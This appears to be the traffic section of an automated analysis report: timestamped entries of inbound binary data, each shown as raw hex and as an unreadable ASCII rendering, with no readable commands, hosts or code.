                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11543INData Raw: fa 31 78 a9 23 0f 2b 90 54 ec e8 97 3f 2a 9c a2 fa 6c 1c 8b 53 08 b9 17 6c 75 e1 57 73 a9 ad 47 bd 68 fc b0 ca 6e 58 19 e3 e8 a6 e0 b2 b8 d0 89 2e 7b 45 1b fe c1 b8 28 dc 5a 20 98 11 82 6b c0 50 17 16 ff 3a 9a 1a 2e 82 94 e5 e7 0c ba d6 c6 64 fb ac d7 6a c0 1c 63 46 e4 a9 95 33 63 c1 f2 27 ba 89 56 c8 df 05 98 d7 67 c7 f0 63 5b ce 09 16 c3 e7 8e fc 91 fa f1 81 c1 2c 11 eb fd f1 2e c8 5f 3d 7b ed f6 01 2d aa 3c a9 cc 8a f5 79 7b e3 a8 9d 5f 3d d6 d5 46 be 10 73 8a 52 d5 d2 c2 fb 73 f4 0f ef 11 2c 13 bf 35 03 a5 52 13 7d fd 43 07 51 0e 3b 0d e4 77 d6 a2 21 af 3f 41 18 f5 1f f2 5a 30 52 30 f1 c6 86 40 db 91 f9 f7 cf 19 f0 8b 0e 32 74 26 c4 ca 89 0f 99 6f c6 73 35 00 78 57 fb 90 e1 56 a3 6a 86 c2 e8 de 96 37 cf c6 e6 f4 8e 43 5d e6 65 01 b5 35 f0 8a 3a cb c9
                                                                                                                                                                                                                                    Data Ascii: 1x#+T?*lSluWsGhnX.{E(Z kP:.djcF3c'Vgc[,._={-<y{_=FsRs,5R}CQ;w!?AZ0R0@2t&os5xWVj7C]e5:
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11559INData Raw: 35 78 ab 4a 63 49 c5 ea 67 af 37 9a 64 3d 85 ee 02 2c b8 d8 88 82 55 70 75 ed f6 24 d5 f6 cd 6a 69 6e 3f a2 63 f9 57 5f 97 79 22 a0 2d 69 c2 1d 20 b6 f8 44 b9 0f 7a 91 84 45 72 bc 10 28 70 22 f1 9a 7f 7b cd 46 56 ee bc a4 bf 6a 77 62 81 e5 53 5a f3 0f bd e8 c0 78 27 23 e6 77 5f 90 db c0 07 53 32 82 b2 bb a3 5c 4e b3 a1 25 22 0b 07 76 dc c1 4b f8 cc 93 0f b6 77 90 ee 6d 32 e2 51 6b e8 b9 34 98 50 6c 72 0e 46 87 62 52 a0 c2 1d ac 6b 93 c0 25 96 31 f8 b9 04 ef 32 1d 96 d4 e4 63 15 55 f0 b2 2f 32 91 11 1e 51 c1 8d af b7 6e 57 81 df 02 12 52 dc fc b1 2e 91 71 d9 47 c0 60 12 dc c3 b3 74 5f 0c d2 37 82 a4 65 47 c1 eb 39 d2 f5 0c 67 f6 0e 67 03 af 27 ae 81 df e7 8a f6 2a a3 45 d5 4c ce a4 e4 e8 d3 eb 3f 6a f8 86 c5 a9 0b 2a a6 a1 d8 1c 34 82 52 b3 0d 01 46 3d a7
                                                                                                                                                                                                                                    Data Ascii: 5xJcIg7d=,Upu$jin?cW_y"-i DzEr(p"{FVjwbSZx'#w_S2\N%"vKwm2Qk4PlrFbRk%12cU/2QnWR.qG`t_7eG9gg'*EL?j*4RF=
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11575INData Raw: 47 ee 4f 06 36 f9 fe 95 26 fb 50 d2 a1 35 23 40 2d 81 78 1e fa e8 d1 4c 84 6f e4 ab ec d5 16 12 69 06 02 6d 62 83 ea a7 cb cf f4 05 8f a7 87 1f 3f 9e d4 5d fa 42 63 b2 74 f1 c5 54 2b da 12 d1 c6 9c 6b 1d 5e 12 b3 6d 8e 3c 69 28 60 56 0a bf 6f dc b8 06 d0 76 db 89 08 e0 d8 0a d0 8c e5 11 45 b9 df 95 81 f7 4a 24 60 e6 77 4a 1c 79 7c 86 f0 a8 f1 1d b3 d9 71 1f ce a5 64 6b b7 df 83 94 bc cb b0 37 75 35 c7 84 0f e0 12 b3 af cf e9 7f d6 b8 e7 4d c2 67 61 cd dd 54 1d 56 2a f6 2a cf 87 08 24 09 b8 1e 85 01 cf 7b 47 1e 93 f4 74 15 71 6c 7e ee d0 0e 41 cc 4f bd 2c 5e 0a b8 8e 2e e4 cd ef 3a bf 1d b3 75 fb a9 15 63 6d f2 6c 05 88 5b 3f b5 bd d4 92 ba 8a 93 9d c8 9f 96 d3 22 d1 ed b4 ac 90 f8 f6 e4 7c 49 9e b5 2d 20 5d c5 82 5a 60 78 54 c8 3a 72 28 f0 c5 b2 cc ff e0
                                                                                                                                                                                                                                    Data Ascii: GO6&P5#@-xLoimb?]BctT+k^m<i(`VovEJ$`wJy|qdk7u5MgaTV**${Gtql~AO,^.:ucml[?"|I- ]Z`xT:r(
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11591INData Raw: e4 82 bc 69 79 73 76 13 84 7d bb 40 c5 c6 a6 6a 2a 08 57 22 fd e3 9b 4a e8 fa b8 03 b1 48 19 1a bb e9 a6 d6 92 35 21 ec ec 70 86 7d 73 39 5e 4b ce da 06 af 11 5c b4 8e cb 6b 55 67 ef bc 44 a1 29 45 ac 4f c1 53 76 14 cf 25 44 d1 ca 94 83 28 98 06 97 11 76 81 ee 8a 43 d5 f4 23 e5 b8 8c ca 0d 33 bf 56 e5 7f 08 5f 76 d5 4b 48 54 d4 31 35 7c 89 66 6c a1 f0 aa c3 ce 6d 33 7e 86 a2 58 44 aa 2d 58 c2 6d 5f 05 35 b7 20 83 82 b5 b4 0d 01 15 a4 97 a6 ae e4 c8 b6 5f bd bf 0c 02 0b 7b 9c 91 f6 60 17 ee 00 cd 40 a2 8b f5 20 0d 65 c7 3f 95 3f 91 31 71 c0 7d 9b 15 2c fe 1f b2 12 39 c6 e4 dd 32 e8 f4 82 7d 08 70 aa 6a 5e 4f f0 32 b0 73 8b ef b1 3d 22 4e a6 80 4f 37 7d 56 40 99 ef 2d 6f 99 70 03 44 64 f6 ce d3 d5 d6 94 8c 68 d7 ca a1 0c 71 22 07 62 96 d9 d2 37 74 54 a5 f7
                                                                                                                                                                                                                                    Data Ascii: iysv}@j*W"JH5!p}s9^K\kUgD)EOSv%D(vC#3V_vKHT15|flm3~XD-Xm_5 _{`@ e??1q},92}pj^O2s="NO7}V@-opDdhq"b7tT
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11607INData Raw: 00 44 cb ed ed 47 8e c8 5e 8c a3 e0 de 59 62 ea f0 91 a0 2f ff 73 83 df b8 18 c5 24 05 e0 07 04 d9 3b d4 57 b0 e0 35 07 0f 45 83 69 29 80 79 27 28 fd 05 85 e4 7c 65 0e 65 1f c8 34 6f 3f 68 b8 2e 23 8c f2 c2 d5 7e f5 55 78 28 14 96 ce 4e 77 fa ee 41 51 9e 84 69 ae 76 3c 46 a7 52 95 5e 18 2c c7 e4 f9 1f 5e 44 d0 bf 83 01 ec 6e 37 96 c2 75 14 4b 47 d0 1d 86 c4 7c 07 21 45 b7 ac fa b4 2e 19 a9 31 ac f1 e9 22 d6 b7 a3 c8 af 16 c3 d0 09 ee 8c de 9b c7 c3 24 4d a4 df 84 e2 03 e6 f3 20 3e 8e cd 34 d3 08 e8 c6 f2 7f eb 37 3e 0b 14 4b f8 9f 48 4f 7f dd 84 a6 27 0b 90 7e 6e d4 31 7b 5a c5 d6 1a e1 3b 31 5e ee 22 dc 52 f6 c2 c4 dc d3 1c 53 90 92 06 17 04 3a c3 06 82 64 a2 f7 9d 2f 21 4c b0 6a 44 f0 b9 b6 84 19 2e a5 46 a6 49 cd 56 0c f3 e8 e6 89 43 42 90 13 f1 30 32
                                                                                                                                                                                                                                    Data Ascii: DG^Yb/s$;W5Ei)y'(|ee4o?h.#~Ux(NwAQiv<FR^,^Dn7uKG|!E.1"$M >47>KHO'~n1{Z;1^"RS:d/!LjD.FIVCB02
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11623INData Raw: 6b c7 aa 4a 26 71 97 3c 03 b9 73 ad e3 79 ea 07 cd ce 1f cc b8 d5 92 50 3e 9d 8f e2 07 bb 74 17 09 0a a5 57 a0 bc 7e 9f 2d d5 01 77 ca f0 00 bc 0b d5 59 fe 0d 44 95 37 4f cd 44 80 53 c9 47 ed f5 60 bd 63 ec c4 dc 53 a8 92 66 98 ad a8 03 52 b3 c5 ea 80 74 b0 40 14 a7 cb 49 db 03 3d 9e a2 ca 2e b7 22 92 a7 46 98 a4 39 53 45 fd e8 a0 9e 00 a2 7b 83 9c a5 94 fa 77 92 f3 b7 12 f8 77 1f f5 95 9e 5f 0f 9e 54 f8 bd 0e 2e 85 46 5d 80 0e 87 12 0a fc b2 33 a0 4f 8f 3d 7b 94 f4 2d d1 23 ef eb 07 33 20 57 ef f8 de 68 86 53 7b a1 94 d7 68 cd c3 a9 29 14 b0 93 17 23 13 59 0f d4 76 91 b1 16 d7 69 e0 f7 27 e7 b6 3e a8 83 37 35 76 aa b2 95 72 12 7b 89 ce 65 0e b7 bd 62 9c c6 d0 8f e7 e1 b2 33 9c 1e f4 75 e2 1d 01 ea 89 74 9a d4 e1 70 f1 48 53 c7 e7 71 67 2f 46 46 77 4c be
                                                                                                                                                                                                                                    Data Ascii: kJ&q<syP>tW~-wYD7ODSG`cSfRt@I=."F9SE{ww_T.F]3O={-#3 WhS{h)#Yvi'>75vr{eb3utpHSqg/FFwL
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11639INData Raw: 4a 8e 9e 77 f3 28 b8 17 fa 1d a0 69 d1 bc 1b d7 71 64 10 05 05 c0 af 21 0f 06 ec 2b 3e 06 50 9b 1d b4 1f ea 41 e7 c9 92 07 a0 69 c0 ed 68 82 f1 31 b8 da 8d da ca b5 1f df b2 78 23 cf 09 c4 52 4a 56 b4 32 9f 13 c3 d5 9e cd a3 38 7c 45 6e 5a 5b b2 19 70 ae 38 08 ae 99 a7 72 ea 1b 6c fe df be b9 c9 ac 18 3b 84 4c 65 06 88 5c 41 a3 59 3c 8d 08 88 47 5e e6 59 86 1f a3 a4 ab 9b 80 47 7a 83 7b ac d5 94 c8 f7 cd 49 28 c0 86 0c 70 f2 3a a9 7e 72 e2 fc 05 ff 71 69 5c 14 38 aa 03 bf 24 b1 80 25 2c a7 6d 3e 08 d4 40 70 f0 3d f0 e0 40 1d 22 e7 9f 48 d4 3a d0 8f f9 08 6b 85 8f d7 85 9a 4c 74 81 ed 7d 49 1a 6b 0c ed 45 ab a1 b2 ac 78 fe 56 02 c5 a4 ad 30 ed 72 fc 6c e2 21 cd 3c a1 5c f9 4a 45 58 b6 41 48 ba 14 7c 20 c0 05 c3 a6 0d 97 c1 66 2a d5 0e 41 8d 00 67 8c aa 40
                                                                                                                                                                                                                                    Data Ascii: Jw(iqd!+>PAih1x#RJV28|EnZ[p8rl;Le\AY<G^YGz{I(p:~rqi\8$%,m>@p=@"H:kLt}IkExV0rl!<\JEXAH| f*Ag@
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11655INData Raw: db bd f1 de 67 7c f9 e3 c1 b9 f1 4b 19 51 c5 eb b2 1d 04 c2 9f c4 12 32 f0 86 4d 7d cb f2 74 b5 e3 1c e2 4d 77 81 4c cd 20 7f fe fd bd 4f e6 2b 20 7b 89 c0 49 44 95 31 7c cf 6d 0e a0 26 cb 45 94 45 f7 fd aa f9 21 d5 4e 6d 7f 29 0a 2a 53 3f 37 cb 4e ad d2 58 29 ee d5 12 d7 5d 71 9f 39 ad ce 83 c5 99 fa 22 a0 de 71 0c 5e 37 c7 c1 b4 00 c5 5c c6 ce 32 12 9d 9f f6 f4 84 a5 c4 17 1d 94 43 f4 68 b9 ed 01 8b ca b4 11 22 54 f6 7f 05 1c 3b 8e 22 a4 a0 b1 72 c2 f6 9e dd ce ca ba da 29 54 5a 4a 0a 5e 89 84 41 8e 81 28 be bc 87 86 a4 6b 36 40 18 a4 d6 45 1b 67 10 bd 3e 46 eb 74 c9 4a b1 fd f3 73 1f af 35 0e c7 f1 16 b8 ab 74 d6 8c cf 2f d0 86 68 42 37 42 3d c3 1a b8 3a f8 01 1d cd a8 8f c5 0f c9 28 d8 25 fa af 3d e4 3d 06 e3 61 fe 18 af bb 70 ea c9 09 d5 f3 86 a4 74
                                                                                                                                                                                                                                    Data Ascii: g|KQ2M}tMwL O+ {ID1|m&EE!Nm)*S?7NX)]q9"q^7\2Ch"T;"r)TZJ^A(k6@Eg>FtJs5t/hB7B=:(%==apt
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11671INData Raw: fd f6 b0 77 99 b4 2b ce fd bd 1d b1 5d b1 11 52 57 24 51 55 a6 cd 31 f1 e4 d3 4c 80 45 91 6c 63 26 b3 64 77 04 b5 4a 65 85 7b a7 a7 15 eb ec 86 a0 b9 14 60 bb 93 06 77 19 ab 9f 1c 9f 6a db 5d b8 74 c5 5c 31 f6 6e 70 f4 1e 45 7e af a9 79 6f ff c1 81 62 4b 3c 10 45 96 9e 8a 7e 74 43 48 fb f2 6e bd 13 2a 55 6f 0c c7 20 ae 51 12 73 3a cc b8 68 91 a8 9c 29 53 22 b1 a0 e9 15 5c 88 d4 ea 77 15 57 65 94 aa 8c 45 24 df c9 83 6f be 09 02 53 ed 34 f1 c0 18 ec 81 bb a5 a5 58 b9 d0 c8 e9 a3 f6 c7 a3 f5 bf 07 56 50 ed 9d 7b f6 e5 2f a8 aa fa 03 74 65 42 10 fb 88 1c b9 c2 bf be cf 82 8c fd e1 72 80 42 f9 a4 d9 d9 d9 67 b8 28 da 02 52 7c e5 33 1c 4b c3 65 d1 70 c8 6c 2f 25 7c 79 10 38 ae 77 fa ab ff e4 e0 74 75 a1 49 db 30 d5 39 3b c3 dd e5 28 42 f4 96 53 01 3b f3 4c 8e
                                                                                                                                                                                                                                    Data Ascii: w+]RW$QU1LElc&dwJe{`wj]t\1npE~yobK<E~tCHn*Uo Qs:h)S"\wWeE$oS4XVP{/teBrBg(R|3Kepl/%|y8wtuI09;(BS;L
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11687INData Raw: e6 a2 4f 93 78 49 77 85 79 a8 c4 06 ef 20 ec 1f 58 f2 2b 05 ff 38 4d 2a d7 83 10 e2 26 98 fd 4d 8b 38 1c ce ad 23 e7 72 a7 34 48 11 f3 5d 30 d6 36 f4 a2 8c be c8 8a 34 26 eb 0b 34 df e1 72 b4 8f b8 aa 75 48 bc f6 db bf 86 6f dc 66 a5 07 43 9f c0 20 76 66 7f 15 ca eb 93 f9 04 cc fe f1 9c b9 ec dc 11 be 18 ee 22 90 65 ad 4a 8c 30 1b ab 60 74 72 89 25 4a b1 2a fb 92 65 da ad cf 21 ec d2 08 c1 90 b6 d3 47 6d f2 9c 47 29 3e 50 b5 fc 1a ed a1 68 99 b2 d0 77 a8 8f d9 9b 35 19 87 9f 29 a5 18 07 a2 84 04 8f 04 84 e0 ce 0f d5 8d d8 4c f3 d6 d1 18 2c 57 c3 10 5b ca 8f 05 f9 c7 75 27 ac 14 2f 11 64 ce 9a 28 16 ce d2 9d 08 75 59 9b 58 c9 b3 65 56 fd d2 90 03 1e a8 71 4a 54 63 70 f5 38 02 ea 83 05 c1 2a dc 48 be 8e 4f 81 ff 50 aa 51 7c d0 45 34 fc 3f 25 72 14 7a fa e9
                                                                                                                                                                                                                                    Data Ascii: OxIwy X+8M*&M8#r4H]064&4ruHofC vf"eJ0`tr%J*e!GmG)>Phw5)L,W[u'/d(uYXeVqJTcp8*HOPQ|E4?%rz
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11703INData Raw: 4a 8d f8 73 97 71 a2 84 f6 ee fd 0d e4 85 5a 5b c7 d5 5a 04 7a bc a9 bd e3 63 ea 5b a6 8e 2e a1 f2 d5 97 bc 13 6f 75 bf 25 79 de 24 dc 55 f4 1e b3 47 82 f7 dc ab 8a 7f 36 af 56 c0 e1 11 2f de c5 a7 50 d0 da 15 a4 a4 31 09 ef be 9e a8 ad 7e c1 a9 da 7c c1 3a 11 5d f8 51 72 45 dd 77 94 29 e5 02 fe 73 5e 8c bc 7f da 28 95 42 a6 30 1a b2 4c 35 2a 86 5c 32 28 d6 99 b0 aa 63 07 77 86 5d 7d 46 97 56 2b ac 47 47 a8 26 98 12 5d be ba f2 5c e7 bf 56 40 6e b6 8c ae f7 3e 3b cb a1 5e 89 b8 1e e3 a8 d2 c6 4e 3d 1b fa 53 cc 9a ec 6e fd 71 9b f7 96 c4 96 19 07 57 8e f8 be fc b3 92 45 61 78 e3 13 78 01 75 36 23 80 45 12 73 e5 e0 f2 c7 09 b5 10 22 da 38 d4 2c 6c 00 85 e5 b0 53 d4 99 b5 f5 5c 19 87 4c c0 56 a0 50 cb 35 b4 8c 02 3f 16 bc 20 c5 61 d2 9d 18 6d ec 2d 1e 71 23
                                                                                                                                                                                                                                    Data Ascii: JsqZ[Zzc[.ou%y$UG6V/P1~|:]QrEw)s^(B0L5*\2(cw]}FV+GG&]\V@n>;^N=SnqWEaxxu6#Es"8,lS\LVP5? am-q#
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11719INData Raw: d1 93 98 03 e9 3a ce d1 d7 ac 31 13 84 20 05 5c 9e 96 05 25 7f d6 3a 7f db 70 ee 4d c7 34 3b 18 75 50 d9 bf 3f 1f de b6 58 ed 97 63 22 89 83 ec 33 48 29 c9 49 80 9f ca 0e 23 da e0 e2 cd 57 5e 4c 27 f8 a3 b2 09 e4 79 72 68 d5 02 be 44 37 7c d1 06 e7 a6 6f ca 84 e6 4b 00 4f 56 82 aa ef bc 46 a0 4c 23 ee 51 26 af 8f 6d 6a cc 7b 6b ad 87 9d 15 73 84 ef ad 63 16 32 64 a8 00 8e 43 ce 2e 02 70 39 3c e2 c4 51 e6 c3 13 02 1c 6a 22 c2 85 ff 81 b8 b1 59 9a 0b 33 69 f9 29 ce 1b 3f cd b6 25 7b 3d 50 56 ce 4e 0c 6b a4 dd 16 1a ce e8 0a 5c 7c b7 23 2e 1a 3a 5a fc ed 70 a9 30 6b c9 e7 8e 73 bf a5 cb 68 32 3d 76 b2 c4 aa 9a b7 29 35 66 98 b6 a2 0b a0 3e d1 74 b3 fc b3 05 26 73 ca 68 8c 80 90 02 5f 7f 04 4d dc cc 83 12 52 2b bc 58 c9 05 d2 13 ab a8 12 2e a1 65 83 25 83 94
                                                                                                                                                                                                                                    Data Ascii: :1 \%:pM4;uP?Xc"3H)I#W^L'yrhD7|oKOVFL#Q&mj{ksc2dC.p9<Qj"Y3i)?%{=PVNk\|#.:Zp0ksh2=v)5f>t&sh_MR+X.e%
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11735INData Raw: f8 8a 57 1d 1b 63 ba 4e c7 eb 06 12 b5 cf df 94 e2 90 00 35 19 ec d7 66 e9 42 2e ea f2 2c 21 d3 f2 71 e6 ed c7 d5 a1 06 ff cc 9d 79 55 df 91 57 bd f0 da 4d 4e c5 ee 37 6d 90 aa a3 22 64 d9 08 d8 90 be b3 60 45 2b 4c a4 95 94 76 ad f8 af 63 1e e1 13 e7 76 f1 5c f2 1d f8 a7 26 1a c8 72 c7 29 e8 39 84 e7 52 2c d6 3d 5e 01 c1 b0 ec bf 01 86 df 83 fd 51 30 8a 28 2e 60 28 b2 2c a9 67 18 22 e2 5f 21 31 3a 01 a6 a8 dc b8 20 10 7d db 6f 26 d7 ac 04 eb f5 a6 80 0e e4 89 62 a6 b8 d9 16 9b b4 22 e2 70 77 64 a0 c1 2c 30 c6 12 63 13 c9 ba ed b2 f3 ca e0 df a2 64 b1 c2 85 14 a1 e0 bf 4b c8 63 d9 d3 f6 29 c2 75 77 ba 68 43 8e 0d 9a 61 71 56 fc 1e 96 4a 32 d5 6f ce 68 e8 f3 b6 b1 10 77 48 10 b8 df 93 8f 71 e6 86 d5 50 b9 9f 53 08 94 29 0b bb 7d 35 4a 2d d0 5c 3e 80 2a 27
                                                                                                                                                                                                                                    Data Ascii: WcN5fB.,!qyUWMN7m"d`E+Lvcv\&r)9R,=^Q0(.`(,g"_!1: }o&b"pwd,0cdKc)uwhCaqVJ2ohwHqPS)}5J-\>*'
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11751INData Raw: 1f f1 4c ad c6 46 bd ce e3 51 f6 d5 f1 40 9a 3d 6f 93 0e 5d a0 00 17 07 40 8b ae d5 b0 97 91 90 a7 ae cc 5c 26 17 e2 a0 2d 39 d1 4c b5 58 a5 f0 c7 a7 b3 59 73 bc 33 2e a2 b8 00 67 d1 28 f2 7b 4b 9d cb 2c b0 9f 51 91 b2 05 54 5b d4 85 b9 63 0e f9 66 fd 3f 1b 63 45 37 a4 62 33 52 69 c7 1d fd 28 00 bf 1e 1b 68 72 ba a4 6f 43 7c c9 8b af 6c ff f0 1e 77 16 64 4f e8 e6 22 3c 64 e5 c7 aa 08 86 a2 45 47 70 e0 d8 13 67 d7 58 36 7e ad d5 9e 84 60 f0 72 47 21 6a a5 ac 81 8c 4e 0c 70 7e 89 10 01 9a e4 fe b9 f9 62 83 c8 17 46 5e 22 7e c2 a2 2d 6a 0b bc 95 9b d7 7d bc e2 ef f0 3e 6c 94 1c eb e8 74 17 89 1e b2 05 3a 59 c4 75 fc 3f fa b6 02 0b ec da eb e9 26 54 53 11 a5 d7 a7 e2 77 c9 85 4c e2 f8 c1 a6 5b 19 71 60 4f 5a 44 0a ec 63 5e 3f 28 2b 82 d8 78 82 f5 f9 43 18 53
                                                                                                                                                                                                                                    Data Ascii: LFQ@=o]@\&-9LXYs3.g({K,QT[cf?cE7b3Ri(hroC|lwdO"<dEGpgX6~`rG!jNp~bF^"~-j}>lt:Yu?&TSwL[q`OZDc^?(+xCS
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11767INData Raw: 0a 6c ea 1f 50 d0 58 7b af 05 4d 1d 7a 66 7b 5b 24 65 32 ef 3e a6 93 00 76 95 be a8 42 97 c2 81 5e e2 b0 12 44 34 b1 13 ef 27 8c 34 2e 9b df 88 6e 42 54 72 d7 ff 83 6f da 47 94 73 5c 22 a2 93 64 e8 4a ac 56 d4 3b cf e0 60 c4 e6 96 ce 66 f9 0c 38 e2 08 22 df 49 fa f6 43 e0 59 cf 23 7a 48 65 b8 33 89 e6 73 81 cb 70 0c 11 5f 64 b4 b9 43 5b 40 21 e4 ed bb b1 41 cc d9 91 c5 ce 34 c7 b2 68 6e e1 ac d6 49 0a 50 fb 60 77 41 4d 5b 1c 33 03 18 b5 95 7a 3a 01 c8 dc b8 1f 35 a4 82 bc ea b6 93 0f c8 0b bd 46 8d 62 3c eb 91 22 18 7e 72 50 16 aa aa c0 de 63 bb b5 10 3b 7b 4e 46 56 51 74 c4 e9 43 48 21 33 4b 0e 6c 7a 3b 55 b9 ab 0e 81 56 31 20 66 87 50 00 5d 42 07 83 59 00 ee c6 49 74 cc f9 b5 88 8b 5f 56 f9 e9 07 e7 17 6c 55 16 f7 71 b1 73 90 b3 35 56 5e e6 6f 9d e6 00
                                                                                                                                                                                                                                    Data Ascii: lPX{Mzf{[$e2>vB^D4'4.nBTroGs\"dJV;`f8"ICY#zHe3sp_dC[@!A4hnIP`wAM[3z:5Fb<"~rPc;{NFVQtCH!3Klz;UV1 fP]BYIt_VlUqs5V^o
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11783INData Raw: b0 aa 73 cc 56 49 e4 20 50 ff c2 ae f7 34 8e dd 55 03 0d 7d b8 9d 85 14 00 5e f1 e9 dc 3c b1 be 4b e2 c5 3c 8b 6e 11 67 a8 e1 88 9b 37 d3 0d 61 86 e0 33 32 1b de b8 00 6c 74 0f e4 12 f5 5d a2 0a 8f 65 03 a0 42 d9 14 ee 3a df ea 5c c3 91 b5 94 2a 5c a4 22 63 2a bc 7f 5b e0 86 bd 7a 34 4c 48 2e bb 9e 35 cc 9d fc ff de ab c6 2b 78 29 dd 1c 57 1a 7f 79 e1 e4 00 de fb fd 25 fb 3f 5c b1 a4 30 f1 06 30 1e c3 9d 50 57 ef 5b 49 f9 ae 58 b3 6a 92 ec 99 3a d1 9e e5 a6 a3 d5 1b 23 39 1c 2f 8a 86 1e e3 65 8a 07 52 ab c4 c3 29 3e 69 cd 9f 28 77 44 45 7e 6b 77 92 fe 1d ff 2c 65 ec fd dd 23 76 64 9e 8e 34 6e 9b 51 30 17 d9 5e d9 dc 96 1c 1d 6b 2b f2 39 ad 52 b9 e6 e6 1b 78 e8 94 63 ed 71 e3 02 f2 8e 69 ef 5a 8a aa ee 9c 2f 09 71 8f 39 3f 38 74 81 b6 0d 02 49 f5 65 15 bb
                                                                                                                                                                                                                                    Data Ascii: sVI P4U}^<K<ng7a32lt]eB:\*\"c*[z4LH.5+x)Wy%?\00PW[IXj:#9/eR)>i(wDE~kw,e#vd4nQ0^k+9RxcqiZ/q9?8tIe
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11799INData Raw: 40 93 15 80 5b 72 f5 2f c9 3c 61 6b 05 85 91 74 dc 73 6f 45 04 be 2d b6 99 eb a7 dc ff 61 f6 3d e7 68 8e e1 f2 43 83 b1 49 0b c0 3a 8f fb 8c 03 ba 09 a9 9d e8 83 78 6b b5 70 76 1d c4 fa 13 36 5d 02 70 14 2b 9b e8 4e 78 2e 70 b0 6f 7d ef 98 73 0c 10 12 df f0 ba a1 4e 01 62 fc a6 5a 13 d5 29 b1 56 1c 5e c4 c4 45 06 0a 3d 19 01 65 15 0f 54 60 6f 5d ec 95 b1 ca d4 f5 b3 31 eb a2 e3 a0 1c f6 60 d6 d6 98 54 f6 e5 2a c8 0c d4 bf 4a c9 8c df 50 6b 09 c6 11 7f 78 5e fd d7 3f 51 08 02 34 3b 56 a3 33 00 b9 e6 87 0a a9 0f 13 d6 3a b8 f4 b1 3d 25 58 1c 0d c9 72 55 6e 07 21 15 0c 67 e4 1d 7d 7a 50 2d 1b 05 87 1e 05 01 96 f3 6c f1 bb 23 8d ca b9 52 74 80 eb a6 85 1e 17 b6 d1 36 af 9b db fe 27 6e c9 f1 7a 42 f4 df 09 74 a4 53 09 5a 18 26 5c 8c 1a 99 b6 d0 94 de 1a 3a e3
                                                                                                                                                                                                                                    Data Ascii: @[r/<aktsoE-a=hCI:xkpv6]p+Nx.po}sNbZ)V^E=eT`o]1`T*JPkx^?Q4;V3:=%XrUn!g}zP-l#Rt6'nzBtSZ&\:
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11815INData Raw: 2d 71 eb fc 71 4b 49 0e 3b 1f 17 db f5 f6 f0 49 04 f8 67 8b 8d 64 a9 51 35 04 00 0e 2c 73 47 e8 5b 9b 1d 7c af 41 03 c9 bb 56 98 bb 15 e4 90 de 02 ee d7 85 95 15 69 f1 96 ca 07 a9 d9 40 7c 1a 1b 27 c8 1d f2 5c 12 e2 50 4c 75 a7 96 30 7d 88 96 60 93 be 60 cd b2 e2 6d 43 5c 91 4d ac d0 32 60 ab a4 c6 f8 47 e5 71 e3 33 14 c4 d2 30 fa 1d d7 59 65 4b 28 45 ba 0f 2a bd d9 37 04 1b 71 1c 25 f7 51 07 4b b0 b1 02 24 0d 16 20 bc bd 1f c0 f4 00 d5 74 f5 0b ae 51 87 64 8c a6 c1 97 98 34 42 2b e0 97 87 3d 21 cf b3 fb d6 7d 9d 60 0e 56 e8 49 21 66 89 85 b3 0f 9c 64 41 d8 8f 0e 6f b0 3b cd 80 8b e6 66 b9 af 73 e7 c4 ab a0 8b 06 c6 4b b8 4c 76 65 ba 2c bb e5 b9 df 6e b1 1d c4 76 0b 70 96 4c d2 e9 f7 bc c6 5b 51 61 76 89 a5 f6 7b 92 e5 a5 06 08 6b 8c 2a 34 b2 c0 0e 44 0c
                                                                                                                                                                                                                                    Data Ascii: -qqKI;IgdQ5,sG[|AVi@|'\PLu0}``mC\M2`Gq30YeK(E*7q%QK$ tQd4B+=!}`VI!fdAo;fsKLve,nvpL[Qav{k*4D
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11831INData Raw: 8e 10 77 98 c3 bd f9 e4 61 03 f2 8f 64 50 7f a5 84 b1 6f 4d d3 d8 d5 26 67 df 6a 8e b8 80 f4 a0 fe 85 2a 04 29 50 6b 58 2e 5a bd 3e 3a 2f 20 08 36 34 e5 8c e2 57 66 c2 8f 23 0d d8 e1 f5 67 69 eb c1 ce 71 f6 3e 31 04 12 69 aa 52 26 06 47 0d a4 e3 c6 88 1b cc f3 c0 80 5a b9 0d e1 e9 59 c6 1e 4f 08 4d 43 63 13 3c d8 0d 27 28 84 55 e4 42 fe ae 4a 87 e9 fa 91 8a 7b 8e 86 56 64 1f 8d 16 a3 d1 cb 16 e1 41 fc 48 82 a0 e3 77 47 1d f7 91 7a 3b c8 2a 63 eb 9e 67 ee 93 44 f9 84 ef 66 94 a0 02 40 1d af ce e6 05 ea 18 e2 16 62 19 78 3e 36 be 59 01 56 bd 27 ce cc 7b fa 82 b3 a7 cd a8 ec c7 c8 0e 7f f2 d7 96 ac 13 97 39 2e db 36 a8 ed ab 43 48 c8 34 14 cf 26 1d b7 a0 c8 aa ae fa b0 b8 31 ac 6c f7 d8 97 3c f4 27 88 21 aa c0 c2 00 05 ef 75 47 94 f3 9f 44 ee e3 b1 86 83 1a
                                                                                                                                                                                                                                    Data Ascii: wadPoM&gj*)PkX.Z>:/ 64Wf#giq>1iR&GZYOMCc<'(UBJ{VdAHwGz;*cgDf@bx>6YV'{9.6CH4&1l<'!uGD
